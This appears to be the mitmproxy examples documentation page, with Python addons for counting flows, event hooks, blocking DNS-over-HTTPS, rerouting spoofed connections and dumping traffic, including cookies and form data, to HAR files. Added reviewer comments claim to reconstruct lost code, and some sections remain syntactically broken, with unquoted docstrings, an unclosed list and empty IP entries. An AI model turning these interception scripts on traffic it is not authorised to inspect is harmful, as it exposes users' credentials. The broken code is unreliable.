Edit on GitHub

#  Examples of Addons and Scripts

The most recent set of examples is also available on our GitHub project.

#  addons

#  Example: addons/addheader.py

class AddHeader:
    """Append a running request counter to every HTTP response."""

    def __init__(self):
        # Number of responses seen so far.
        self.num = 0

    def response(self, flow):
        """Increment the counter and expose it via a "count" header."""
        self.num += 1
        flow.response.headers["count"] = str(self.num)

# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [AddHeader()]

#  Example: addons/anatomy.py

from mitmproxy import ctx

class Counter:
    """Log a running total of the flows this addon has seen."""

    def __init__(self):
        # Total number of requests observed so far.
        self.num = 0

    def request(self, flow):
        """Count the request and log the new total."""
        self.num += 1
        ctx.log.info("We've seen %d flows" % self.num)

# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [Counter()]

#  Example: addons/commands-flows.py

import typing

from mitmproxy import command
from mitmproxy import ctx
from mitmproxy import flow

class MyAddon:
    """Example addon exposing a flow-manipulating command."""

    def __init__(self):
        self.num = 0

    # NOTE(review): the @command.command decorator was lost in extraction;
    # restored from the upstream commands-flows.py example (the `command`
    # import is otherwise unused).
    @command.command("myaddon.addheader")
    def addheader(self, flows: typing.Sequence[flow.Flow]) -> None:
        """Set "myheader" on the request of every given flow."""
        for f in flows:
            f.request.headers["myheader"] = "value"
        ctx.log.alert("done")

# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [MyAddon()]

#  Example: addons/commands-paths.py

import typing

from mitmproxy import command
from mitmproxy import ctx
from mitmproxy import flow
from mitmproxy import types

class MyAddon:
    """Example addon exposing a command that writes a host histogram to a file."""

    def __init__(self):
        self.num = 0

    # NOTE(review): the decorator and the `self` parameter were lost in
    # extraction; restored from the upstream commands-paths.py example.
    @command.command("myaddon.histogram")
    def histogram(
        self,
        flows: typing.Sequence[flow.Flow],
        path: types.Path,
    ) -> None:
        """Write "count: host" lines for *flows* to *path*."""
        totals: typing.Dict[str, int] = {}
        for f in flows:
            totals[f.request.host] = totals.setdefault(f.request.host, 0) + 1

        with open(path, "w+") as fp:
            for cnt, dom in sorted([(v, k) for (k, v) in totals.items()]):
                fp.write("%s: %s\n" % (cnt, dom))
        ctx.log.alert("done")


# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [MyAddon()]

#  Example: addons/commands-simple.py

from mitmproxy import command
from mitmproxy import ctx

class MyAddon:
    """Example addon exposing a simple counter command."""

    def __init__(self):
        self.num = 0

    # NOTE(review): the @command.command decorator was lost in extraction;
    # restored from the upstream commands-simple.py example.
    @command.command("myaddon.inc")
    def inc(self) -> None:
        """Increment the counter and log its value."""
        self.num += 1
        ctx.log.info("num = %s" % self.num)

# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [MyAddon()]

#  Example: addons/events-http-specific.py

import mitmproxy.http

class Events:
    """Skeleton addon documenting the HTTP-specific event hooks.

    Extraction stripped the triple quotes from the method docstrings,
    leaving invalid syntax; they are restored here.
    """

    # HTTP lifecycle
    def http_connect(self, flow: mitmproxy.http.HTTPFlow):
        """
            An HTTP CONNECT request was received. Setting a non 2xx response on
            the flow will return the response to the client and abort the
            connection. CONNECT requests and responses do not generate the usual
            HTTP handler events. CONNECT requests are only valid in regular and
            upstream proxy modes.
        """

    def requestheaders(self, flow: mitmproxy.http.HTTPFlow):
        """
            HTTP request headers were successfully read. At this point, the body
            is empty.
        """

    def request(self, flow: mitmproxy.http.HTTPFlow):
        """
            The full HTTP request has been read.
        """

    def responseheaders(self, flow: mitmproxy.http.HTTPFlow):
        """
            HTTP response headers were successfully read. At this point, the body
            is empty.
        """

    def response(self, flow: mitmproxy.http.HTTPFlow):
        """
            The full HTTP response has been read.
        """

    def error(self, flow: mitmproxy.http.HTTPFlow):
        """
            An HTTP error has occurred, e.g. invalid server responses, or
            interrupted connections. This is distinct from a valid server HTTP
            error response, which is simply a response with an HTTP error code.
        """

#  Example: addons/events-tcp-specific.py

import mitmproxy.tcp

class Events:
    """Skeleton addon documenting the TCP-specific event hooks.

    Extraction stripped the triple quotes from the method docstrings,
    leaving invalid syntax; they are restored here.
    """

    # TCP lifecycle
    def tcp_start(self, flow: mitmproxy.tcp.TCPFlow):
        """
            A TCP connection has started.
        """

    def tcp_message(self, flow: mitmproxy.tcp.TCPFlow):
        """
            A TCP connection has received a message. The most recent message
            will be flow.messages[-1]. The message is user-modifiable.
        """

    def tcp_error(self, flow: mitmproxy.tcp.TCPFlow):
        """
            A TCP error has occurred.
        """

    def tcp_end(self, flow: mitmproxy.tcp.TCPFlow):
        """
            A TCP connection has ended.
        """

#  Example: addons/events-websocket-specific.py

import mitmproxy.http
import mitmproxy.websocket

class Events:
    """Skeleton addon documenting the WebSocket-specific event hooks.

    Extraction stripped the triple quotes from the method docstrings,
    leaving invalid syntax; they are restored here.
    """

    # Websocket lifecycle
    def websocket_handshake(self, flow: mitmproxy.http.HTTPFlow):
        """
            Called when a client wants to establish a WebSocket connection. The
            WebSocket-specific headers can be manipulated to alter the
            handshake. The flow object is guaranteed to have a non-None request
            attribute.
        """

    def websocket_start(self, flow: mitmproxy.websocket.WebSocketFlow):
        """
            A websocket connection has commenced.
        """

    def websocket_message(self, flow: mitmproxy.websocket.WebSocketFlow):
        """
            Called when a WebSocket message is received from the client or
            server. The most recent message will be flow.messages[-1]. The
            message is user-modifiable. Currently there are two types of
            messages, corresponding to the BINARY and TEXT frame types.
        """

    def websocket_error(self, flow: mitmproxy.websocket.WebSocketFlow):
        """
            A websocket connection has had an error.
        """

    def websocket_end(self, flow: mitmproxy.websocket.WebSocketFlow):
        """
            A websocket connection has ended.
        """

#  Example: addons/events.py

import typing

import mitmproxy.addonmanager
import mitmproxy.connections
import mitmproxy.http
import mitmproxy.log
import mitmproxy.tcp
import mitmproxy.websocket
import mitmproxy.proxy.protocol

class Events:
    """Skeleton addon documenting the generic (network + lifecycle) event hooks.

    Extraction stripped the triple quotes from the method docstrings,
    leaving invalid syntax; they are restored here.
    """

    # Network lifecycle
    def clientconnect(self, layer: mitmproxy.proxy.protocol.Layer):
        """
            A client has connected to mitmproxy. Note that a connection can
            correspond to multiple HTTP requests.
        """

    def clientdisconnect(self, layer: mitmproxy.proxy.protocol.Layer):
        """
            A client has disconnected from mitmproxy.
        """

    def serverconnect(self, conn: mitmproxy.connections.ServerConnection):
        """
            Mitmproxy has connected to a server. Note that a connection can
            correspond to multiple requests.
        """

    def serverdisconnect(self, conn: mitmproxy.connections.ServerConnection):
        """
            Mitmproxy has disconnected from a server.
        """

    def next_layer(self, layer: mitmproxy.proxy.protocol.Layer):
        """
            Network layers are being switched. You may change which layer will
            be used by returning a new layer object from this event.
        """

    # General lifecycle
    def configure(self, updated: typing.Set[str]):
        """
            Called when configuration changes. The updated argument is a
            set-like object containing the keys of all changed options. This
            event is called during startup with all options in the updated set.
        """

    def done(self):
        """
            Called when the addon shuts down, either by being removed from
            the mitmproxy instance, or when mitmproxy itself shuts down. On
            shutdown, this event is called after the event loop is
            terminated, guaranteeing that it will be the final event an addon
            sees. Note that log handlers are shut down at this point, so
            calls to log functions will produce no output.
        """

    def load(self, entry: mitmproxy.addonmanager.Loader):
        """
            Called when an addon is first loaded. This event receives a Loader
            object, which contains methods for adding options and commands. This
            method is where the addon configures itself.
        """

    def log(self, entry: mitmproxy.log.LogEntry):
        """
            Called whenever a new log entry is created through the mitmproxy
            context. Be careful not to log from this event, which will cause an
            infinite loop!
        """

    def running(self):
        """
            Called when the proxy is completely up and running. At this point,
            you can expect the proxy to be bound to a port, and all addons to be
            initialized.
        """

    def update(self, flows: typing.Sequence[mitmproxy.flow.Flow]):
        """
            Update is called when one or more flow objects have been modified,
            usually from a different addon.
        """

#  Example: addons/options-configure.py

import typing

from mitmproxy import ctx
from mitmproxy import exceptions

class AddHeader:
    """Optionally add an "addheader" header (value capped at 100) to responses."""

    def load(self, loader):
        """Register the "addheader" option.

        Extraction dropped the ``loader.add_option(`` call, leaving bare
        tuple assignments; restored from the upstream options-configure.py.
        """
        loader.add_option(
            name="addheader",
            typespec=typing.Optional[int],
            default=None,
            help="Add a header to responses",
        )

    def configure(self, updates):
        """Validate the option whenever it changes (including startup)."""
        if "addheader" in updates:
            if ctx.options.addheader is not None and ctx.options.addheader > 100:
                raise exceptions.OptionsError("addheader must be <= 100")

    def response(self, flow):
        """Stamp the configured value onto every response, if set."""
        if ctx.options.addheader is not None:
            flow.response.headers["addheader"] = str(ctx.options.addheader)

# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [AddHeader()]

#  Example: addons/options-simple.py

from mitmproxy import ctx

class AddHeader:
    """Add a response counter header, gated behind an option."""

    def __init__(self):
        # Number of responses counted so far.
        self.num = 0

    def load(self, loader):
        """Register the "addheader" option.

        Extraction dropped the ``loader.add_option(`` call, leaving bare
        tuple assignments; restored from the upstream options-simple.py.
        """
        loader.add_option(
            name="addheader",
            typespec=bool,
            default=False,
            help="Add a count header to responses",
        )

    def response(self, flow):
        """Only count and stamp when the option is enabled."""
        if ctx.options.addheader:
            self.num = self.num + 1
            flow.response.headers["count"] = str(self.num)

# Register the addon with mitmproxy (restores the list truncated in extraction).
addons = [AddHeader()]

#  Example: addons/scripting-headers.py

def request(flow):
    """Tag every outgoing request with a fixed "myheader" header."""
    headers = flow.request.headers
    headers["myheader"] = "value"

#  complex

#  Example: complex/block_dns_over_https.py

This module is for blocking DNS over HTTPS requests.

It loads a blocklist of IPs and hostnames that are known to serve DNS over HTTPS requests.
It also uses headers, query params, and paths to detect DoH (and block it)
from typing import List

from mitmproxy import ctx

# known DoH providers' hostnames and IP addresses to block
# known DoH providers' hostnames and IP addresses to block
# NOTE(review): the closing brackets were lost in extraction and are restored
# here. The empty "" entries were IPv4 literals stripped by the same
# extraction (only IPv6 addresses survived) — recover them from the upstream
# block_dns_over_https.py / https://github.com/curl/curl/wiki/DNS-over-HTTPS.
default_blocklist: dict = {
    "hostnames": [
        "dns.adguard.com", "dns-family.adguard.com", "dns.google", "cloudflare-dns.com",
        "mozilla.cloudflare-dns.com", "security.cloudflare-dns.com", "family.cloudflare-dns.com",
        "dns.quad9.net", "dns9.quad9.net", "dns10.quad9.net", "dns11.quad9.net", "doh.opendns.com",
        "doh.familyshield.opendns.com", "doh.cleanbrowsing.org", "doh.xfinity.com", "dohdot.coxlab.net",
        "odvr.nic.cz", "doh.dnslify.com", "dns.nextdns.io", "dns.dnsoverhttps.net", "doh.crypto.sx",
        "doh.powerdns.org", "doh-fi.blahdns.com", "doh-jp.blahdns.com", "doh-de.blahdns.com",
        "doh.ffmuc.net", "dns.dns-over-https.com", "doh.securedns.eu", "dns.rubyfish.cn",
        "dns.containerpi.com", "dns.containerpi.com", "dns.containerpi.com", "doh-2.seby.io",
        "doh.seby.io", "commons.host", "doh.dnswarden.com", "doh.dnswarden.com", "doh.dnswarden.com",
        "dns-nyc.aaflalo.me", "dns.aaflalo.me", "doh.applied-privacy.net", "doh.captnemo.in",
        "doh.tiar.app", "doh.tiarap.org", "doh.dns.sb", "rdns.faelix.net", "doh.li", "doh.armadillodns.net",
        "jp.tiar.app", "jp.tiarap.org", "doh.42l.fr", "dns.hostux.net", "dns.hostux.net", "dns.aa.net.uk",
        "adblock.mydns.network", "ibksturm.synology.me", "jcdns.fun", "ibuki.cgnat.net", "dns.twnic.tw",
        "example.doh.blockerdns.com", "dns.digitale-gesellschaft.ch", "doh.libredns.gr",
        "doh.centraleu.pi-dns.com", "doh.northeu.pi-dns.com", "doh.westus.pi-dns.com",
        "doh.eastus.pi-dns.com", "dns.flatuslifir.is", "private.canadianshield.cira.ca",
        "protected.canadianshield.cira.ca", "family.canadianshield.cira.ca", "dns.google.com",
    ],
    "ips": [
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "2001:148f:fffe::1",
        "2001:19f0:7001:3259:5400:2ff:fe71:bc9", "2001:19f0:7001:5554:5400:2ff:fe57:3077",
        "2001:19f0:7001:5554:5400:2ff:fe57:3077", "2001:19f0:7001:5554:5400:2ff:fe57:3077",
        "2001:4860:4860::8844", "2001:4860:4860::8888",
        "2001:4b98:dc2:43:216:3eff:fe86:1d28", "2001:558:fe21:6b:96:113:151:149",
        "2001:608:a01::3", "2001:678:888:69:c45d:2738:c3f2:1878", "2001:8b0::2022", "2001:8b0::2023",
        "2001:c50:ffff:1:101:101:101:101", "", "", "",
        "2400:6180:0:d0::5f73:4001", "2400:8902::f03c:91ff:feda:c514", "2604:180:f3::42",
        "2604:a880:1:20::51:f001", "2606:4700::6810:f8f9", "2606:4700::6810:f9f9", "2606:4700::6812:1a80",
        "2606:4700::6812:1b80", "2606:4700::6812:237", "2606:4700::6812:337", "2606:4700:3033::6812:2ccc",
        "2606:4700:3033::6812:2dcc", "2606:4700:3033::6818:7b35", "2606:4700:3034::681c:16a",
        "2606:4700:3035::6818:7a35", "2606:4700:3035::681f:5a8a", "2606:4700:3036::681c:6a",
        "2606:4700:3036::681f:5b8a", "2606:4700:60:0:a71e:6467:cef8:2a56", "2620:10a:80bb::10",
        # BUG FIX: a missing comma here produced implicit string concatenation
        # ("…bb::30" "…bc::10"), silently merging two addresses into one entry.
        "2620:10a:80bb::20", "2620:10a:80bb::30", "2620:10a:80bc::10", "2620:10a:80bc::20",
        "2620:10a:80bc::30", "2620:119:fc::2", "2620:119:fc::3", "2620:fe::10", "2620:fe::11",
        "2620:fe::9", "2620:fe::fe:10", "2620:fe::fe:11", "2620:fe::fe:9", "2620:fe::fe",
        "2a00:5a60::ad1:ff", "2a00:5a60::ad2:ff", "2a00:5a60::bad1:ff", "2a00:5a60::bad2:ff",
        "2a00:d880:5:bf0::7c93", "2a01:4f8:1c0c:8233::1", "2a01:4f8:1c1c:6b4b::1", "2a01:4f8:c2c:52bf::1",
        "2a01:4f9:c010:43ce::1", "2a01:4f9:c01f:4::abcd", "2a01:7c8:d002:1ef:5054:ff:fe40:3703",
        "2a01:9e00::54", "2a01:9e00::55", "2a01:9e01::54", "2a01:9e01::55",
        "2a02:1205:34d5:5070:b26e:bfff:fe1d:e19b", "2a03:4000:38:53c::2",
        "2a03:b0c0:0:1010::e9a:3001", "2a04:bdc7:100:70::abcd", "2a05:fc84::42", "2a05:fc84::43",
        "2a07:a8c0::", "2a0d:4d00:81::1", "2a0d:5600:33:3::abcd", "", "",
        "", "", "", "", "",
        "", "", "", "", "",
        "", "", "", "", "", "",
        "", "", "", "",
    ],
}

# additional hostnames to block
# user-supplied extra hostnames to block (empty by default; closing bracket
# was lost in extraction)
additional_doh_names: List[str] = []

# additional IPs to block
# user-supplied extra IPs to block (empty by default; closing bracket was
# lost in extraction)
additional_doh_ips: List[str] = []


# unpack the blocklist into the two lookup collections used by the checks below
doh_hostnames, doh_ips = default_blocklist['hostnames'], default_blocklist['ips']

# convert to sets for faster lookups
doh_hostnames = set(doh_hostnames)
doh_ips = set(doh_ips)

def _has_dns_message_content_type(flow):
    Check if HTTP request has a DNS-looking 'Content-Type' header

    :param flow: mitmproxy flow
    :return: True if 'Content-Type' header is DNS-looking, False otherwise
    doh_content_types = ['application/dns-message']
    if 'Content-Type' in flow.request.headers:
        if flow.request.headers['Content-Type'] in doh_content_types:
            return True
    return False

def _request_has_dns_query_string(flow):
    Check if the query string of a request contains the parameter 'dns'

    :param flow: mitmproxy flow
    :return: True is 'dns' is a parameter in the query string, False otherwise
    return 'dns' in flow.request.query

def _request_is_dns_json(flow):
    Check if the request looks like DoH with JSON.

    The only known implementations of DoH with JSON are Cloudflare and Google.

    For more info, see:
    - https://developers.cloudflare.com/
    - https://developers.google.com/speed/public-dns/docs/doh/json

    :param flow: mitmproxy flow
    :return: True is request looks like DNS JSON, False otherwise
    # Header 'Accept: application/dns-json' is required in Cloudflare's DoH JSON API
    # or they return a 400 HTTP response code
    if 'Accept' in flow.request.headers:
        if flow.request.headers['Accept'] == 'application/dns-json':
            return True
    # Google's DoH JSON API is https://dns.google/resolve
    path = flow.request.path.split('?')[0]
    if flow.request.host == 'dns.google' and path == '/resolve':
        return True
    return False

def _request_has_doh_looking_path(flow):
    Check if the path looks like it's DoH.
    Most common one is '/dns-query', likely because that's what's in the RFC

    :param flow: mitmproxy flow
    :return: True if path looks like it's DoH, otherwise False
    doh_paths = [
        '/dns-query',       # used in example in RFC 8484 (see https://tools.ietf.org/html/rfc8484#section-4.1.1)
    path = flow.request.path.split('?')[0]
    return path in doh_paths

def _requested_hostname_is_in_doh_blacklist(flow):
    """
    Check if server hostname is in our DoH provider blacklist.

    The current blacklist is taken from https://github.com/curl/curl/wiki/DNS-over-HTTPS.

    :param flow: mitmproxy flow
    :return: True if server's hostname is in DoH blacklist, otherwise False
    """
    hostname = flow.request.host
    ip = flow.server_conn.address
    return hostname in doh_hostnames or hostname in doh_ips or ip in doh_ips

# all detection heuristics applied to each request, in order
# (list contents were truncated in extraction; restored from the helper
# functions defined above)
doh_request_detection_checks = [
    _has_dns_message_content_type,
    _request_has_dns_query_string,
    _request_is_dns_json,
    _request_has_doh_looking_path,
    _requested_hostname_is_in_doh_blacklist,
]

def request(flow):
    """Run all DoH detection checks; block the flow if any matches."""
    for check in doh_request_detection_checks:
        is_doh = check(flow)

        if is_doh:
            ctx.log.warn("[DoH Detection] DNS over HTTPS request detected via method \"%s\"" % check.__name__)
            # NOTE(review): the kill/break were lost in extraction; without
            # killing, the script would only log and never actually block DoH
            # (the module's stated purpose). Restored from upstream.
            flow.kill()
            break

#  Example: complex/change_upstream_proxy.py

from mitmproxy import http
import typing

# This scripts demonstrates how mitmproxy can switch to a second/different upstream proxy
# in upstream proxy mode.
# Usage: mitmdump -U http://default-upstream-proxy.local:8080/ -s change_upstream_proxy.py
# If you want to change the target server, you should modify flow.request.host and flow.request.port

def proxy_address(flow: http.HTTPFlow) -> typing.Tuple[str, int]:
    """Pick the upstream proxy for this flow's host.

    Poor man's loadbalancing: route every second domain through the
    alternative proxy. The ``else`` was lost in extraction, which made the
    second return unreachable and even-hash hosts return None.
    """
    if hash(flow.request.host) % 2 == 1:
        return ("localhost", 8082)
    else:
        return ("localhost", 8081)

def request(flow: http.HTTPFlow) -> None:
    """Point the live flow at the chosen upstream proxy."""
    if flow.request.method == "CONNECT":
        # If the decision is done by domain, one could also modify the server address here.
        # We do it after CONNECT here to have the request data available as well.
        # (the `return` was lost in extraction, leaving an empty if-body)
        return
    address = proxy_address(flow)
    if flow.live:
        flow.live.change_upstream_proxy_server(address)  # type: ignore

#  Example: complex/dns_spoofing.py

This script makes it possible to use mitmproxy in scenarios where IP spoofing
has been used to redirect connections to mitmproxy. The way this works is that
we rely on either the TLS Server Name Indication (SNI) or the Host header of the
HTTP request. Of course, this is not foolproof - if an HTTPS connection comes
without SNI, we don't know the actual target and cannot construct a certificate
that looks valid. Similarly, if there's no Host header or a spoofed Host header,
we're out of luck as well. Using transparent mode is the better option most of
the time.

    Usage:
        mitmproxy
            -p 443
            -s dns_spoofing.py
            # Used as the target location if neither SNI nor host header are present.
            --mode reverse:http://example.com/
            # To avoid auto rewriting of host header by the reverse proxy target.
            --set keep_host_header
        mitmdump
            -p 80
            --mode reverse:http://localhost:443/

    (Setting up a single proxy instance and using iptables to redirect to it
    works as well)
import re

# This regex splits the host header into host and port.
# Handles the edge case of IPv6 addresses containing colons.
# https://bugzilla.mozilla.org/show_bug.cgi?id=45891
parse_host_header = re.compile(r"^(?P<host>[^:]+|\[.+\])(?::(?P<port>\d+))?$")

class Rerouter:
    def request(self, flow):
        """Rewrite the request destination from SNI or the Host header.

        The ``else`` was lost in extraction, making the HTTP branch clobber
        the HTTPS one unconditionally; restored from upstream dns_spoofing.py.
        """
        if flow.client_conn.tls_established:
            flow.request.scheme = "https"
            sni = flow.client_conn.connection.get_servername()
            port = 443
        else:
            flow.request.scheme = "http"
            sni = None
            port = 80

        host_header = flow.request.host_header
        m = parse_host_header.match(host_header)
        if m:
            host_header = m.group("host").strip("[]")
            if m.group("port"):
                port = int(m.group("port"))

        flow.request.host_header = host_header
        flow.request.host = sni or host_header
        flow.request.port = port

addons = [Rerouter()]

#  Example: complex/dup_and_replay.py

from mitmproxy import ctx

def request(flow):
    """Duplicate the request with a changed path and replay it."""
    # Avoid an infinite loop by not replaying already replayed requests
    if flow.request.is_replay:
        # (the `return` was lost in extraction, leaving an empty if-body)
        return
    flow = flow.copy()
    # Only interactive tools have a view. If we have one, add a duplicate entry
    # for our flow.
    if "view" in ctx.master.addons:
        ctx.master.commands.call("view.flows.add", [flow])
    flow.request.path = "/changed"
    ctx.master.commands.call("replay.client", [flow])

#  Example: complex/har_dump.py

This inline script can be used to dump flows as HAR files.

example cmdline invocation:
mitmdump -s ./har_dump.py --set hardump=./dump.har

A filename ending with '.zhar' will be compressed:
mitmdump -s ./har_dump.py --set hardump=./dump.zhar

import json
import base64
import zlib
import os
import typing  # noqa

from datetime import datetime
from datetime import timezone

import mitmproxy

from mitmproxy import connections  # noqa
from mitmproxy import version
from mitmproxy import ctx
from mitmproxy.utils import strutils
from mitmproxy.net.http import cookies

# The complete HAR archive accumulated over the proxy's lifetime;
# initialised in configure() and serialized in done().
HAR: typing.Dict = {}

# A list of server seen till now is maintained so we can avoid
# using 'connect' time for entries that use an existing connection.
SERVERS_SEEN: typing.Set[connections.ServerConnection] = set()

def load(l):
    """Register the "hardump" option (output path for the HAR file).

    The ``l.add_option(`` call was lost in extraction; restored from the
    upstream har_dump.py.
    """
    l.add_option(
        "hardump", str, "", "HAR dump path.",
    )

def configure(updated):
    """(Re)initialise the skeleton HAR log structure.

    The ``HAR.update({`` wrapper and closing braces were lost in extraction;
    restored from the upstream har_dump.py.
    """
    HAR.update({
        "log": {
            "version": "1.2",
            "creator": {
                "name": "mitmproxy har_dump",
                "version": "0.1",
                "comment": "mitmproxy version %s" % version.MITMPROXY
            },
            "entries": []
        }
    })

def response(flow):
    """
       Called when a server response has been received. Builds one HAR entry
       for the completed flow and appends it to the global HAR structure.

       NOTE(review): several statements and closing braces were lost in
       extraction; this body is reconstructed from the upstream har_dump.py —
       confirm against it.
    """
    # -1 indicates that these values do not apply to current request
    ssl_time = -1
    connect_time = -1

    if flow.server_conn and flow.server_conn not in SERVERS_SEEN:
        connect_time = (flow.server_conn.timestamp_tcp_setup -
                        flow.server_conn.timestamp_start)

        if flow.server_conn.timestamp_tls_setup is not None:
            ssl_time = (flow.server_conn.timestamp_tls_setup -
                        flow.server_conn.timestamp_tcp_setup)

        SERVERS_SEEN.add(flow.server_conn)

    # Calculate raw timings from timestamps. DNS timings can not be calculated
    # for lack of a way to measure it. The same goes for HAR blocked.
    # mitmproxy will open a server connection as soon as it receives the host
    # and port from the client connection. So, the time spent waiting is actually
    # spent waiting between request.timestamp_end and response.timestamp_start
    # thus it correlates to HAR wait instead.
    timings_raw = {
        'send': flow.request.timestamp_end - flow.request.timestamp_start,
        'receive': flow.response.timestamp_end - flow.response.timestamp_start,
        'wait': flow.response.timestamp_start - flow.request.timestamp_end,
        'connect': connect_time,
        'ssl': ssl_time,
    }

    # HAR timings are integers in ms, so we re-encode the raw timings to that format.
    timings = {
        k: int(1000 * v) if v != -1 else -1
        for k, v in timings_raw.items()
    }

    # full_time is the sum of all timings.
    # Timings set to -1 will be ignored as per spec.
    full_time = sum(v for v in timings.values() if v > -1)

    started_date_time = datetime.fromtimestamp(flow.request.timestamp_start, timezone.utc).isoformat()

    # Response body size and encoding
    response_body_size = len(flow.response.raw_content) if flow.response.raw_content else 0
    response_body_decoded_size = len(flow.response.content) if flow.response.content else 0
    response_body_compression = response_body_decoded_size - response_body_size

    entry = {
        "startedDateTime": started_date_time,
        "time": full_time,
        "request": {
            "method": flow.request.method,
            "url": flow.request.url,
            "httpVersion": flow.request.http_version,
            "cookies": format_request_cookies(flow.request.cookies.fields),
            "headers": name_value(flow.request.headers),
            "queryString": name_value(flow.request.query or {}),
            "headersSize": len(str(flow.request.headers)),
            "bodySize": len(flow.request.content),
        },
        "response": {
            "status": flow.response.status_code,
            "statusText": flow.response.reason,
            "httpVersion": flow.response.http_version,
            "cookies": format_response_cookies(flow.response.cookies.fields),
            "headers": name_value(flow.response.headers),
            "content": {
                "size": response_body_size,
                "compression": response_body_compression,
                "mimeType": flow.response.headers.get('Content-Type', '')
            },
            "redirectURL": flow.response.headers.get('Location', ''),
            "headersSize": len(str(flow.response.headers)),
            "bodySize": response_body_size,
        },
        "cache": {},
        "timings": timings,
    }

    # Store binary data as base64
    if strutils.is_mostly_bin(flow.response.content):
        entry["response"]["content"]["text"] = base64.b64encode(flow.response.content).decode()
        entry["response"]["content"]["encoding"] = "base64"
    else:
        entry["response"]["content"]["text"] = flow.response.get_text(strict=False)

    if flow.request.method in ["POST", "PUT", "PATCH"]:
        params = [
            {"name": a, "value": b}
            for a, b in flow.request.urlencoded_form.items(multi=True)
        ]
        entry["request"]["postData"] = {
            "mimeType": flow.request.headers.get("Content-Type", ""),
            "text": flow.request.get_text(strict=False),
            "params": params
        }

    if flow.server_conn.connected():
        entry["serverIPAddress"] = str(flow.server_conn.ip_address[0])

    HAR["log"]["entries"].append(entry)


def done():
    """
        Called once on script shutdown, after any other events.
        Serializes the accumulated HAR to stdout ('-') or to the
        configured file, compressing when the path ends in '.zhar'.
    """
    if ctx.options.hardump:
        json_dump: str = json.dumps(HAR, indent=2)

        if ctx.options.hardump == '-':
            # '-' means dump to the mitmproxy log / stdout
            mitmproxy.ctx.log(json_dump)
        else:
            raw: bytes = json_dump.encode()
            if ctx.options.hardump.endswith('.zhar'):
                raw = zlib.compress(raw, 9)

            with open(os.path.expanduser(ctx.options.hardump), "wb") as f:
                f.write(raw)

            mitmproxy.ctx.log("HAR dump finished (wrote %s bytes to file)" % len(json_dump))

def format_cookies(cookie_list):
    """Convert (name, value, attrs) cookie triples into HAR cookie dicts."""
    rv = []

    for name, value, attrs in cookie_list:
        cookie_har = {
            "name": name,
            "value": value,
        }

        # HAR only needs some attributes
        for key in ["path", "domain", "comment"]:
            if key in attrs:
                cookie_har[key] = attrs[key]

        # These keys need to be boolean!
        for key in ["httpOnly", "secure"]:
            cookie_har[key] = bool(key in attrs)

        # Expiration time needs to be formatted
        expire_ts = cookies.get_expiration_ts(attrs)
        if expire_ts is not None:
            cookie_har["expires"] = datetime.fromtimestamp(expire_ts, timezone.utc).isoformat()

        # (the append was lost in extraction — without it every HAR entry
        # would report an empty cookie list)
        rv.append(cookie_har)

    return rv

def format_request_cookies(fields):
    # group_cookies presumably folds the flat Cookie-header (name, value)
    # pairs into the (name, value, attrs) triples format_cookies expects —
    # confirm against mitmproxy.net.http.cookies.
    return format_cookies(cookies.group_cookies(fields))

def format_response_cookies(fields):
    # Set-Cookie fields arrive as (name, (value, attrs)); flatten each to the
    # (name, value, attrs) triple format_cookies expects.
    return format_cookies((c[0], c[1][0], c[1][1]) for c in fields)

def name_value(obj):
    """
        Convert (key, value) pairs to HAR format.
    """
    return [{"name": k, "value": v} for k, v in obj.items()]

#  Example: complex/mitmproxywrapper.py

#!/usr/bin/env python
# Helper tool to enable/disable OS X proxy and wrap mitmproxy
# Get usage information with:
# mitmproxywrapper.py -h

import subprocess
import re
import argparse
import contextlib
import os
import sys

class Wrapper:
    """Toggle the OS X system web proxy around a wrapped mitmproxy run.

    NOTE(review): many method bodies and the @classmethod /
    @contextlib.contextmanager decorators were truncated in extraction; this
    class is reconstructed from the upstream mitmproxywrapper.py — confirm
    against it before relying on details.
    """

    def __init__(self, port, extra_arguments=None):
        self.port = port
        self.extra_arguments = extra_arguments

    def run_networksetup_command(self, *arguments):
        # networksetup requires root; see ensure_superuser().
        return subprocess.check_output(
            ['sudo', 'networksetup'] + list(arguments))

    def proxy_state_for_service(self, service):
        """Return the '-getwebproxy' key/value output as a dict."""
        state = self.run_networksetup_command(
            '-getwebproxy', service).splitlines()
        return dict([re.findall(r'([^:]+): (.*)', line)[0] for line in state])

    def enable_proxy_for_service(self, service):
        print('Enabling proxy on {}...'.format(service))
        for subcommand in ['-setwebproxy', '-setsecurewebproxy']:
            # NOTE(review): the proxy host literal was stripped in extraction;
            # '127.0.0.1' matches the upstream script.
            self.run_networksetup_command(
                subcommand, service, '127.0.0.1', str(self.port))

    def disable_proxy_for_service(self, service):
        print('Disabling proxy on {}...'.format(service))
        for subcommand in ['-setwebproxystate', '-setsecurewebproxystate']:
            self.run_networksetup_command(subcommand, service, 'Off')

    def interface_name_to_service_name_map(self):
        """Map device names (en0, ...) to network service names."""
        order = self.run_networksetup_command('-listnetworkserviceorder')
        mapping = re.findall(
            r'\(\d+\)\s(.*)$\n\(.*Device: (.+)\)$',
            order,
            re.MULTILINE)
        return dict([(b, a) for (a, b) in mapping])

    def run_command_with_input(self, command, input):
        popen = subprocess.Popen(
            command,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            universal_newlines=True)
        (stdout, stderr) = popen.communicate(input)
        return stdout

    def primary_interace_name(self):
        scutil_script = 'get State:/Network/Global/IPv4\nd.show\n'
        stdout = self.run_command_with_input('/usr/sbin/scutil', scutil_script)
        interface, = re.findall(r'PrimaryInterface\s*:\s*(.+)', stdout)
        return interface

    def primary_service_name(self):
        return self.interface_name_to_service_name_map()[
            self.primary_interace_name()]

    def proxy_enabled_for_service(self, service):
        return self.proxy_state_for_service(service)['Enabled'] == 'Yes'

    def toggle_proxy(self):
        new_state = not self.proxy_enabled_for_service(
            self.primary_service_name())
        for service_name in self.connected_service_names():
            if self.proxy_enabled_for_service(service_name) and not new_state:
                self.disable_proxy_for_service(service_name)
            elif not self.proxy_enabled_for_service(service_name) and new_state:
